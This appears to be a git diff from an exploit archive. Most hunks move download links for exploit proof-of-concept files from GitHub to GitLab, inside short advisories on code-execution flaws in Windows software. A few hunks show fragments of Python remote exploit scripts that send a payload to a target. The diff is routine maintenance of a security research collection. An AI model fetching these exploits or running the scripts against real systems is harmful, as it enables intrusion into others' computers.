socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.37.132", 8080)) -s.send(buf) +s.send(buf) \ No newline at end of file diff --git a/exploits/windows/remote/25016.txt b/exploits/windows/remote/25016.txt index 3911c0d62..289dc8ac0 100644 --- a/exploits/windows/remote/25016.txt +++ b/exploits/windows/remote/25016.txt @@ -4,4 +4,4 @@ asp2php is prone to a buffer overflow vulnerability. This issue is exposed when Successful exploitation would allow for execution of arbitrary code in the context of the user running the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25016.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25016.zip \ No newline at end of file diff --git a/exploits/windows/remote/25020.txt b/exploits/windows/remote/25020.txt index 025e9e027..b96835f81 100644 --- a/exploits/windows/remote/25020.txt +++ b/exploits/windows/remote/25020.txt @@ -8,4 +8,4 @@ If a user obtains this file and processes it through the application, the attack VB2C version 0.02 is reported prone to this vulnerability. It is likely that other versions are affected as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25020.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25020.zip \ No newline at end of file diff --git a/exploits/windows/remote/25021.txt b/exploits/windows/remote/25021.txt index 620e26b23..99518c9a4 100644 --- a/exploits/windows/remote/25021.txt +++ b/exploits/windows/remote/25021.txt @@ -4,4 +4,4 @@ abcpp is prone to a buffer overflow vulnerability. This issue is exposed when th Successful exploitation will result in execution of arbitrary code in the context of the user running the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25021.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25021.zip \ No newline at end of file diff --git a/exploits/windows/remote/25022.txt b/exploits/windows/remote/25022.txt index 9061f7d98..5a1357100 100644 --- a/exploits/windows/remote/25022.txt +++ b/exploits/windows/remote/25022.txt @@ -8,4 +8,4 @@ If a user obtains this file and processes it through the application, the attack abcm2ps version 3.7.20 is reported prone to this vulnerability. It is likely that other versions are affected as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25022.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25022.zip \ No newline at end of file diff --git a/exploits/windows/remote/25023.txt b/exploits/windows/remote/25023.txt index c8b6b1447..31e01ee89 100644 --- a/exploits/windows/remote/25023.txt +++ b/exploits/windows/remote/25023.txt @@ -4,4 +4,4 @@ It is reported that pgn2web is susceptible to a buffer overflow vulnerability. T This vulnerability allow remote attackers to alter the proper flow of execution of the application, potentially resulting in the execution of attacker-supplied machine code in the context of the application attempting to read malicious PGN files. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25023.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25023.zip \ No newline at end of file diff --git a/exploits/windows/remote/25025.txt b/exploits/windows/remote/25025.txt index 30b1359fd..a06664d0b 100644 --- a/exploits/windows/remote/25025.txt +++ b/exploits/windows/remote/25025.txt @@ -4,4 +4,4 @@ abc2ps and jcabc2ps are prone to a buffer overflow vulnerability. This issue is Successful exploitation will result in execution of arbitrary code in the context of the user running the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25025.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25025.zip \ No newline at end of file diff --git a/exploits/windows/remote/25026.txt b/exploits/windows/remote/25026.txt index 055bd730d..5c5870a41 100644 --- a/exploits/windows/remote/25026.txt +++ b/exploits/windows/remote/25026.txt @@ -4,4 +4,4 @@ It is reported that Mesh Viewer is susceptible to a buffer overflow vulnerabilit This vulnerability allow remote attackers to alter the proper flow of execution of the application, potentially resulting in the execution of attacker-supplied machine code in the context of the application attempting to read malicious files. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25026.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25026.zip \ No newline at end of file diff --git a/exploits/windows/remote/25027.txt b/exploits/windows/remote/25027.txt index 4f109f3b7..9ff523a4d 100644 --- a/exploits/windows/remote/25027.txt +++ b/exploits/windows/remote/25027.txt @@ -10,4 +10,4 @@ If a user obtains this file and processes it through the application, the attack abctab2ps version 1.6.3 is reported prone to this vulnerability. It is likely that other versions are affected as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25027.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25027.zip \ No newline at end of file diff --git a/exploits/windows/remote/25029.txt b/exploits/windows/remote/25029.txt index 1e30752c0..5ed1c4f62 100644 --- a/exploits/windows/remote/25029.txt +++ b/exploits/windows/remote/25029.txt @@ -10,4 +10,4 @@ If a user obtains this file and processes it through the application, the attack abctab2ps version 1.6.3 is reported prone to this vulnerability. It is likely that other versions are affected as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25029.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25029.zip \ No newline at end of file diff --git a/exploits/windows/remote/25033.txt b/exploits/windows/remote/25033.txt index b292e8260..ba7e35396 100644 --- a/exploits/windows/remote/25033.txt +++ b/exploits/windows/remote/25033.txt @@ -4,4 +4,4 @@ greed (Get and Resume Elite Edition) is prone to a buffer overflow vulnerability Successful exploitation will result in execution of arbitrary code in the context of the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25033.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25033.zip \ No newline at end of file diff --git a/exploits/windows/remote/25034.txt b/exploits/windows/remote/25034.txt index 0b42994cf..cea2422a1 100644 --- a/exploits/windows/remote/25034.txt +++ b/exploits/windows/remote/25034.txt @@ -4,4 +4,4 @@ greed (Get and Resume Elite Edition) is prone to unauthorized command execution. Successful exploitation will result in command execution in the context of the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25034.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25034.zip \ No newline at end of file diff --git a/exploits/windows/remote/25049.txt b/exploits/windows/remote/25049.txt index 9558b24a4..cfb6d5ce0 100644 --- a/exploits/windows/remote/25049.txt +++ b/exploits/windows/remote/25049.txt @@ -4,4 +4,4 @@ Microsoft Windows is prone to an integer overflow vulnerability. This issue exis Successful exploitation may allow execution of arbitrary code in the context of the user that opens the malicious Help file. The Help file may originate from an external or untrusted source, so this vulnerability is considered remote in nature. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25049.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25049.gz \ No newline at end of file diff --git a/exploits/windows/remote/25050.txt b/exploits/windows/remote/25050.txt index d99b1ecbf..fd7f1ae50 100644 --- a/exploits/windows/remote/25050.txt +++ b/exploits/windows/remote/25050.txt @@ -4,4 +4,4 @@ Microsoft Windows is prone to a heap-based buffer overflow vulnerability. This i Successful exploitation may allow execution of arbitrary code in the context of the user that opens the malicious Help file. The Help file may originate from an external or untrusted source, so this vulnerability is considered remote in nature. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25050.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25050.gz \ No newline at end of file diff --git a/exploits/windows/remote/25057.txt b/exploits/windows/remote/25057.txt index c98158745..2bc8cfaf3 100644 --- a/exploits/windows/remote/25057.txt +++ b/exploits/windows/remote/25057.txt @@ -4,4 +4,4 @@ DivX Player is reported prone to a directory traversal vulnerability. The issue Ultimately an attacker may exploit this issue to save a script or executable file in an arbitrary location. This may lead to the execution of malicious code when the affected system is restarted. Alternatively, the attacker may overwrite a target file with the privileges of a user that is installing a malicious skin file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25057.dps \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25057.dps \ No newline at end of file diff --git a/exploits/windows/remote/25196.txt b/exploits/windows/remote/25196.txt index 3140bdd20..53a3e70b5 100644 --- a/exploits/windows/remote/25196.txt +++ b/exploits/windows/remote/25196.txt @@ -6,4 +6,4 @@ It is likely that the attacker must be in the contact list of an unsuspecting us An attacker may leverage this issue to execute arbitrary code in the context of an unsuspecting user running a vulnerable version of the affected application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25196.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25196.zip \ No newline at end of file diff --git a/exploits/windows/remote/25386.txt b/exploits/windows/remote/25386.txt index e621aa41a..4e8e34dd6 100644 --- a/exploits/windows/remote/25386.txt +++ b/exploits/windows/remote/25386.txt @@ -4,4 +4,4 @@ A vulnerability in Microsoft Internet Explorer may allow remote attackers to exe This issue presents itself the affected application attempts to process certain script objects, a race condition may lead to the execution of attacker-supplied code. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25386.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25386.zip \ No newline at end of file diff --git a/exploits/windows/remote/25454.txt b/exploits/windows/remote/25454.txt index 6640d074b..dce76b437 100644 --- a/exploits/windows/remote/25454.txt +++ b/exploits/windows/remote/25454.txt @@ -2,8 +2,8 @@ source: https://www.securityfocus.com/bid/13248/info Microsoft Windows Explorer is prone to a script injection vulnerability. This occurs when the Windows Explorer preview pane (Web View) is enabled on Windows 2000 computers. Windows 98/98SE/ME are also affected by this issue. If a file with malicious attributes is selected using Explorer, script code contained in the attribute fields may be executed with the privilege level of the user that invoked Explorer. This could be exploited to gain unauthorized access to the vulnerable computer in the context of the currently logged in user. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25454-1.doc +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25454-1.doc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25454-2.doc +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25454-2.doc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25454-3.doc \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25454-3.doc \ No newline at end of file diff --git a/exploits/windows/remote/25989.txt b/exploits/windows/remote/25989.txt index ea78613ed..b0fb59627 100644 --- a/exploits/windows/remote/25989.txt +++ b/exploits/windows/remote/25989.txt @@ -8,4 +8,4 @@ An attacker may exploit this issue to execute arbitrary code with the privileges Versions 5.03a, 5.09, and 5.091 are reported vulnerable to this issue. Other versions are also likely affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25989.mp3 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25989.mp3 \ No newline at end of file diff --git a/exploits/windows/remote/27073.txt b/exploits/windows/remote/27073.txt index 8f40973be..3dbbd01b6 100644 --- a/exploits/windows/remote/27073.txt +++ b/exploits/windows/remote/27073.txt @@ -8,4 +8,4 @@ This vulnerability may be remotely exploited due to project files originating fr Visual Studio 2005 is reportedly vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27073.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27073.zip \ No newline at end of file diff --git a/exploits/windows/remote/27526.txt b/exploits/windows/remote/27526.txt index 2525bd2ca..6282aac09 100644 --- a/exploits/windows/remote/27526.txt +++ b/exploits/windows/remote/27526.txt @@ -47,7 +47,7 @@ a malicious page or open a malicious file. The full exploit code that pops calc.exe is available here: http://packetstormsecurity.com/files/122777/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27526.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27526.tgz +------------------------------------------------------------------------------+ diff --git a/exploits/windows/remote/27569.txt b/exploits/windows/remote/27569.txt index e4b221711..59ca2c8ed 100644 --- a/exploits/windows/remote/27569.txt +++ b/exploits/windows/remote/27569.txt @@ -4,4 +4,4 @@ UltraVNC is susceptible to multiple error-logging remote buffer-overflow vulnera A successful attack may allow remote attackers to execute arbitrary code on a vulnerable computer to gain unauthorized access in the context of the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27569.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27569.zip \ No newline at end of file diff --git a/exploits/windows/remote/27611.txt b/exploits/windows/remote/27611.txt index 7c76f7bb3..bf8198d3b 100644 --- a/exploits/windows/remote/27611.txt +++ b/exploits/windows/remote/27611.txt @@ -47,7 +47,7 @@ must visit a malicious page or open a malicious file. The full exploit code that pops calc.exe is available here: http://packetstormsecurity.com/files/122806/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27611.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27611.tgz +------------------------------------------------------------------------------+ diff --git a/exploits/windows/remote/27746.txt b/exploits/windows/remote/27746.txt index b6290dff4..e96cc1e5f 100644 --- a/exploits/windows/remote/27746.txt +++ b/exploits/windows/remote/27746.txt @@ -6,4 +6,4 @@ A successful attack can allow the attacker to place potentially malicious files This issue affects WinISO version 5.3; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27746.iso.bin \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27746.iso.bin \ No newline at end of file diff --git a/exploits/windows/remote/27754.txt b/exploits/windows/remote/27754.txt index 0308bf50a..87a8336d5 100644 --- a/exploits/windows/remote/27754.txt +++ b/exploits/windows/remote/27754.txt @@ -46,7 +46,7 @@ must visit a malicious page or open a malicious file. The full exploit code that pops calc.exe is available here: http://packetstormsecurity.com/files/122865/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27754.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27754.tgz +------------------------------------------------------------------------------+ diff --git a/exploits/windows/remote/27758.txt b/exploits/windows/remote/27758.txt index 51b12e613..1dbd55d0f 100644 --- a/exploits/windows/remote/27758.txt +++ b/exploits/windows/remote/27758.txt @@ -6,4 +6,4 @@ A successful attack can allow the attacker to place potentially malicious files This issue affects UltraISO version 8.0.0. 1392; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27758.iso.bin \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27758.iso.bin \ No newline at end of file diff --git a/exploits/windows/remote/27759.txt b/exploits/windows/remote/27759.txt index 826b71be8..edb720dd9 100644 --- a/exploits/windows/remote/27759.txt +++ b/exploits/windows/remote/27759.txt @@ -6,4 +6,4 @@ A successful attack can allow the attacker to place potentially malicious files This issue affects MagicISO version 5.0 Build 0166; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27759.iso.bin \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27759.iso.bin \ No newline at end of file diff --git a/exploits/windows/remote/27760.txt b/exploits/windows/remote/27760.txt index 0644071a6..d9450c356 100644 --- a/exploits/windows/remote/27760.txt +++ b/exploits/windows/remote/27760.txt @@ -6,4 +6,4 @@ A successful attack can allow the attacker to place potentially malicious files This issue affects PowerISO version 2.9; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27760.iso.bin \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27760.iso.bin \ No newline at end of file diff --git a/exploits/windows/remote/27943.txt b/exploits/windows/remote/27943.txt index 8db2023d2..a08c6319d 100644 --- a/exploits/windows/remote/27943.txt +++ b/exploits/windows/remote/27943.txt @@ -48,7 +48,7 @@ must visit a malicious page or open a malicious file. The full exploit code that pops calc.exe is available here: http://packetstormsecurity.com/files/122980/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27943.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27943.tgz +------------------------------------------------------------------------------+ diff --git a/exploits/windows/remote/28189.txt b/exploits/windows/remote/28189.txt index 248e309df..c18e3e537 100644 --- a/exploits/windows/remote/28189.txt +++ b/exploits/windows/remote/28189.txt @@ -10,4 +10,4 @@ Note that Microsoft Office applications include functionality to embed Office fi This issue is distinct from the issue described in BID 18422 (Microsoft Excel Unspecified Remote Code Execution Vulnerability). Proof-of-concept 'Nanika.xls' was originally thought to be related to BID 18422; however, reports indicate that 'Nanika.xls' triggers this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28189.xls \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28189.xls \ No newline at end of file diff --git a/exploits/windows/remote/28331.txt b/exploits/windows/remote/28331.txt index b84f3e3ae..138213c40 100644 --- a/exploits/windows/remote/28331.txt +++ b/exploits/windows/remote/28331.txt @@ -48,7 +48,7 @@ malicious file. The full exploit code that pops calc.exe is available here: http://packetstormsecurity.com/files/123263/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28331.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28331.tgz +------------------------------------------------------------------------------+ diff --git a/exploits/windows/remote/29171.txt b/exploits/windows/remote/29171.txt index 442a5b545..7c381c179 100644 --- a/exploits/windows/remote/29171.txt +++ b/exploits/windows/remote/29171.txt @@ -4,4 +4,4 @@ Business Objects Crystal Reports XI Professional is prone to a buffer-overflow v An atacker may exploit this issue by enticing a victim user into opening a malicious document file, resulting in the execution of arbitrary code with privileges of the vulnerable application. Failed exploit attemtps will likely result in denial-of-service conditions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29171.rpt \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29171.rpt \ No newline at end of file diff --git a/exploits/windows/remote/29524.txt b/exploits/windows/remote/29524.txt index f0461a4eb..250c30cd5 100644 --- a/exploits/windows/remote/29524.txt +++ b/exploits/windows/remote/29524.txt @@ -6,4 +6,4 @@ Microsoft Word 2000 is confirmed vulnerable to a remote code-execution issue. Ex Note that this issue is distinct from issues described in BID 21589 (Microsoft Word Code Execution Vulnerability), BID 21451 (Microsoft Word Malformed String Remote Code Execution Vulnerability), and BID 21518 (Microsoft Word Malformed Data Structures Code Execution Vulnerability). -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29524.doc \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29524.doc \ No newline at end of file diff --git a/exploits/windows/remote/29686.txt b/exploits/windows/remote/29686.txt index aad2a96d9..51c7b009f 100644 --- a/exploits/windows/remote/29686.txt +++ b/exploits/windows/remote/29686.txt @@ -4,4 +4,4 @@ Adobe Acrobat and Adobe Reader may allow remote attackers to retrieve the conten Information gathered through a successful exploit of this vulnerability may aid in other attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29686.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29686.zip \ No newline at end of file diff --git a/exploits/windows/remote/29687.py b/exploits/windows/remote/29687.py index 0a48296de..7df950c03 100755 --- a/exploits/windows/remote/29687.py +++ b/exploits/windows/remote/29687.py @@ -57,5 +57,4 @@ else: test=test+1; - print "\n\n\t\t\t[ c0ded by PeTrO ]" - + print "\n\n\t\t\t[ c0ded by PeTrO ]" \ No newline at end of file diff --git a/exploits/windows/remote/29688.txt b/exploits/windows/remote/29688.txt index c8919b731..66844ffbb 100644 --- a/exploits/windows/remote/29688.txt +++ b/exploits/windows/remote/29688.txt @@ -4,4 +4,4 @@ EmbeddedWB Web Browser ActiveX control is prone to a remote code-execution vulne Exploiting this issue allows remote attackers to execute arbitrary machine code in the context of applications using the affected ActiveX control and possibly to compromise affected computers. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29688.ocx \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29688.ocx \ No newline at end of file diff --git a/exploits/windows/remote/30211.txt b/exploits/windows/remote/30211.txt index f240a7fd8..886fe39d2 100644 --- a/exploits/windows/remote/30211.txt +++ b/exploits/windows/remote/30211.txt @@ -17,7 +17,7 @@ privileges. proof of concept url: http://retrogod.altervista.org/9sg_ejb.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30211.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30211.tgz ~rgod~ diff --git a/exploits/windows/remote/3022.txt b/exploits/windows/remote/3022.txt index f77859306..b8b516971 100644 --- a/exploits/windows/remote/3022.txt +++ b/exploits/windows/remote/3022.txt @@ -2,6 +2,6 @@ # Solar Eclipse # solareclipse at phreedom dot org -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3022.tar.gz (12262006-killbill.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3022.tar.gz (12262006-killbill.tar.gz) # milw0rm.com [2004-03-26] \ No newline at end of file diff --git a/exploits/windows/remote/30537.txt b/exploits/windows/remote/30537.txt index bc598ee48..75274970a 100644 --- a/exploits/windows/remote/30537.txt +++ b/exploits/windows/remote/30537.txt @@ -4,4 +4,4 @@ Microsoft MSN Messenger is prone to a buffer-overflow vulnerability because it f Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will likely result in denial-of-service conditions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30537.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30537.rar \ No newline at end of file diff --git a/exploits/windows/remote/31032.txt b/exploits/windows/remote/31032.txt index 1210ad06b..8de43bbd4 100644 --- a/exploits/windows/remote/31032.txt +++ b/exploits/windows/remote/31032.txt @@ -14,4 +14,4 @@ Earlier versions may be affected as well. UPDATE (January 24, 2008): This issue was originally documented as a denial-of-service issue, but reliable reports suggest that this issue can be exploited to execute arbitrary code. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31032.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31032.zip \ No newline at end of file diff --git a/exploits/windows/remote/31056.py b/exploits/windows/remote/31056.py index bd31fdaa6..79cbe7fa3 100755 --- a/exploits/windows/remote/31056.py +++ b/exploits/windows/remote/31056.py @@ -330,4 +330,4 @@ while s != "quit": except EOFError: s = "quit" print s - print result(s) + print result(s) \ No newline at end of file diff --git a/exploits/windows/remote/31254.py b/exploits/windows/remote/31254.py index 09e518da3..34cb427f1 100755 --- a/exploits/windows/remote/31254.py +++ b/exploits/windows/remote/31254.py @@ -60,6 +60,4 @@ else: conn.send('ABOR '+sploit+'\r\n') cf = conn.recv(1024) #close connection - conn.close() - - + conn.close() \ No newline at end of file diff --git a/exploits/windows/remote/31255.py b/exploits/windows/remote/31255.py index 7bcbe4892..b56f7a4f2 100755 --- a/exploits/windows/remote/31255.py +++ b/exploits/windows/remote/31255.py @@ -60,6 +60,4 @@ else: conn.send('CWD '+sploit+'\r\n') cf = conn.recv(1024) #close connection - conn.close() - - + conn.close() \ No newline at end of file diff --git a/exploits/windows/remote/31409.txt b/exploits/windows/remote/31409.txt index c303fa951..bf024f20d 100644 --- a/exploits/windows/remote/31409.txt +++ b/exploits/windows/remote/31409.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary code within the context BootManage TFTP Server 1.99 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31409.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31409.zip \ No newline at end of file diff --git a/exploits/windows/remote/31583.txt b/exploits/windows/remote/31583.txt index f880db2cf..b73ebea78 100644 --- a/exploits/windows/remote/31583.txt +++ b/exploits/windows/remote/31583.txt @@ -12,4 +12,4 @@ Microsoft Office 2007 Other products that use the Crypto API provided by Windows may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31583.docx \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31583.docx \ No newline at end of file diff --git a/exploits/windows/remote/32339.txt b/exploits/windows/remote/32339.txt index c0476df0e..790df7bec 100644 --- a/exploits/windows/remote/32339.txt +++ b/exploits/windows/remote/32339.txt @@ -8,4 +8,4 @@ Successful exploits may allow attackers to execute arbitrary code within the con Microsoft Organization Chart 2.00,19 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32339.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32339.rar \ No newline at end of file diff --git a/exploits/windows/remote/32699.txt b/exploits/windows/remote/32699.txt index fcb342fa8..2db47255c 100644 --- a/exploits/windows/remote/32699.txt +++ b/exploits/windows/remote/32699.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to port-scan networks inside a victim computer' Google Chrome 1.0.154.36 is affected; other versions may also be vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32699.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32699.zip \ No newline at end of file diff --git a/exploits/windows/remote/3274.txt b/exploits/windows/remote/3274.txt index 0a16513cb..ecb3e3671 100644 --- a/exploits/windows/remote/3274.txt +++ b/exploits/windows/remote/3274.txt @@ -21,6 +21,6 @@ download: http://www.0xdeadbeef.info/exploits/raptor_winudf.tgz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3274.tgz (02062007-raptor_winudf.tgz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3274.tgz (02062007-raptor_winudf.tgz) # milw0rm.com [2007-02-06] \ No newline at end of file diff --git a/exploits/windows/remote/32851.html b/exploits/windows/remote/32851.html index 71ffafaf0..d7bc2b056 100644 --- a/exploits/windows/remote/32851.html +++ b/exploits/windows/remote/32851.html @@ -13,7 +13,7 @@ Generation: c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf - Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32851-AsXploit.as + Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32851-AsXploit.as --> diff --git a/exploits/windows/remote/33024.txt b/exploits/windows/remote/33024.txt index c3233b5e6..43407f7c2 100644 --- a/exploits/windows/remote/33024.txt +++ b/exploits/windows/remote/33024.txt @@ -4,4 +4,4 @@ Microsoft Internet Explorer is prone to a cross-domain information-disclosure vu An attacker can exploit this issue to access local files or content from a browser window in another domain or security zone. This may allow the attacker to obtain sensitive information or may aid in further attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33024.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33024.zip \ No newline at end of file diff --git a/exploits/windows/remote/33071.txt b/exploits/windows/remote/33071.txt index fa7bb2fad..e84ebc405 100644 --- a/exploits/windows/remote/33071.txt +++ b/exploits/windows/remote/33071.txt @@ -8,7 +8,7 @@ # More info on: http://funoverip.net/?p=1685 & https://github.com/funoverip/epowner PoC: -v0.2.1- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33071-2.tar.gz (epowner-0.2.1.zip) +v0.2.1- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33071-2.tar.gz (epowner-0.2.1.zip) ===================================================================================================== INTRODUCTION diff --git a/exploits/windows/remote/33172.txt b/exploits/windows/remote/33172.txt index d9e3054d6..32fe000b3 100644 --- a/exploits/windows/remote/33172.txt +++ b/exploits/windows/remote/33172.txt @@ -6,5 +6,5 @@ An attacker may exploit this issue to execute arbitrary code in the context of t Source Engine 3968 and prior builds are affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33172-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33172-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33172-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33172-2.zip \ No newline at end of file diff --git a/exploits/windows/remote/33705.txt b/exploits/windows/remote/33705.txt index ad0da8cb8..765aab64e 100644 --- a/exploits/windows/remote/33705.txt +++ b/exploits/windows/remote/33705.txt @@ -8,4 +8,4 @@ Command On Demand CSS Web Installer ActiveX 1.4.9508.605 is vulnerable; other ve Note: Reports indicate that the vendor no longer supports this product; vendor patches 